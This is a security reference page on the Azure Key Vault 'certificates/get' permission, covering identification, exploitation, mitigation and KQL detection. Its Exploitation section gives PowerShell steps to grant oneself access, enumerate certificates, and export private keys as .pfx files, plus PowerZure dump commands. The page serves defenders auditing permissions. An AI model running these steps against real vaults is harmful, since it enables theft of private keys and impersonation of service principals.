AZ_GET_CERTIFICATES

Summary

FSProtect ACL Alias

AZ_GET_CERTIFICATES

Azure Alias

Get Certificates (Key Vault Data Plane)

Affected Object Types

Key Vaults

Exploitation Certainty

Certain

Permission

Key Vault data-plane permission certificates/get — either via Key Vault access policy or Azure RBAC role Key Vault Certificates User or Key Vault Certificate User

Description

AZ_GET_CERTIFICATES represents the ability to read certificates from an Azure Key Vault. This is a data-plane permission that allows retrieval of certificate objects (and their associated private keys, if exportable) stored in the vault.

Key Vault certificates are used for:

Service principal authentication — certificates used as credentials for Entra ID applications.
TLS/SSL certificates — for web apps, API gateways, and other services.
Code signing certificates.
Encryption certificates — S/MIME, document encryption.

The most dangerous scenario is when certificates are used as service principal credentials. Exporting such a certificate allows an attacker to authenticate as the service principal and inherit all its permissions, including potentially privileged API permissions or Azure RBAC roles.

Identification

PowerShell (Az Module)

Connect-AzAccount

# Check access policies on a vault (vault access policy model)
$vault = Get-AzKeyVault -VaultName "<VaultName>"
$vault.AccessPolicies | Where-Object { $_.PermissionsToCertificates -match "get|list|all" } |
    Select-Object DisplayName, ObjectId, PermissionsToCertificates |
    Format-Table -AutoSize

# Check RBAC assignments (RBAC access model)
Get-AzRoleAssignment -Scope $vault.ResourceId |
    Where-Object { $_.RoleDefinitionName -match "Key Vault Certificate" -or $_.RoleDefinitionName -eq "Key Vault Administrator" } |
    Select-Object DisplayName, RoleDefinitionName, ObjectType |
    Format-Table -AutoSize

Azure GUI

Open Azure Portal → navigate to the target Key Vault.
Go to Access policies → review policies that include Get under Certificate permissions.
Alternatively, go to Access control (IAM) → review assignments for certificate-related roles.

Exploitation

Step 1 — Grant Yourself Certificate Access (as Key Vault Contributor)

Connect-AzAccount

# Grant yourself certificate get/list permissions via access policy
Set-AzKeyVaultAccessPolicy -VaultName "<VaultName>" `
    -ObjectId "<YourObjectId>" `
    -PermissionsToCertificates get,list

Step 2 — Read and Export Certificates

Connect-AzAccount

# List all certificates in the vault
$certs = Get-AzKeyVaultCertificate -VaultName "<VaultName>"

# Read each certificate
$certs | ForEach-Object {
    $cert = Get-AzKeyVaultCertificate -VaultName "<VaultName>" -Name $_.Name
    [PSCustomObject]@{
        Name       = $_.Name
        Thumbprint = $cert.Thumbprint
        NotBefore  = $cert.NotBefore
        Expires    = $cert.Expires
        Enabled    = $cert.Enabled
    }
} | Format-Table -AutoSize

# Export certificate with private key (if exportable)
$certName = "<CertName>"
$secret = Get-AzKeyVaultSecret -VaultName "<VaultName>" -Name $certName -AsPlainText
$secretBytes = [Convert]::FromBase64String($secret)
[IO.File]::WriteAllBytes(".\$certName.pfx", $secretBytes)
Write-Host "Certificate exported to .\$certName.pfx"

Via PowerZure

Get-AzureKeyVaultContent
Export-AzureKeyVaultContent

Opsec Considerations

Azure will create a new log event for the Key Vault whenever a certificate is accessed. Each CertificateGet operation is logged in Key Vault diagnostic logs with the caller identity and IP address.

Mitigation

Restrict certificate access policies
- Go to Azure Portal → target Key Vault → Access policies.
- Remove get permission from any principal that does not need to read certificates.
Mark certificates as non-exportable
- When creating certificates, set the private key as not exportable to prevent extraction.
Switch to Azure RBAC model
- Use granular RBAC roles for certificate access control.
Use managed identities instead of certificates
- Prefer managed identities over certificate-based service principal authentication where possible.
Enable diagnostic logging
- Go to Key Vault → Diagnostic settings → enable AuditEvent logging.

Detection

Monitor certificate access in Key Vault diagnostic logs.

Enable AuditEvent logging on the Key Vault.
Alert on:
- CertificateGet operations, especially on certificates used for service principal auth.
- Bulk certificate access from unusual identities.
- Certificate downloads outside of expected automation patterns.

Azure Monitor / Log Analytics (KQL)

AzureDiagnostics
| where ResourceProvider == "MICROSOFT.KEYVAULT"
| where OperationName in ("CertificateGet", "CertificateList", "SecretGet")
| project TimeGenerated, CallerIPAddress, OperationName, ResultType, identity_claim_upn_s, Resource, id_s

References

PreviousAZ_EXECUTE_COMMAND NextAZ_GET_KEYS

Last updated 6 days ago

Was this helpful?